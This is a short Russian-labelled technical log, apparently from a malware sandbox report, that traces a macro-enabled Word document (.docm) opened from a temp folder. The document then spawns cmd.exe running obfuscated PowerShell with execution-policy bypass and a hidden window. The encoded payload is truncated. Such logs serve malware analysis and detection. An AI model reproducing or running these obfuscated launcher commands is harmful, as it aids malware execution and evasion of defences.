Техническая информация
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\A9R1ojbkyq_1do43gu_d0.tmp\839346.docm"
- '<SYSTEM32>\cmd.exe' /c pOWERSHell -eXECuTIONpOL bYPass -WiNDO 1 -NoPROfilE " . ((Gv '*MDr*').namE[3,11,2]-joiN'')( [STring]::joiN('', (( 32, 38,40, 34,123 , 48 ,125 ,123 , 50,125 , 123,49, 125,34 , 45, 102 ,...
- %TEMP%\a9r1ojbkyq_1do43gu_d0.tmp\839346.docm
- '<SYSTEM32>\cmd.exe' /c pOWERSHell -eXECuTIONpOL bYPass -WiNDO 1 -NoPROfilE " . ((Gv '*MDr*').namE[3,11,2]-joiN'')( [STring]::joiN('', (( 32, 38,40, 34,123 , 48 ,125 ,123 , 50,125 , 123,49, 125,34 , 45, 102 ,... (со скрытым окном)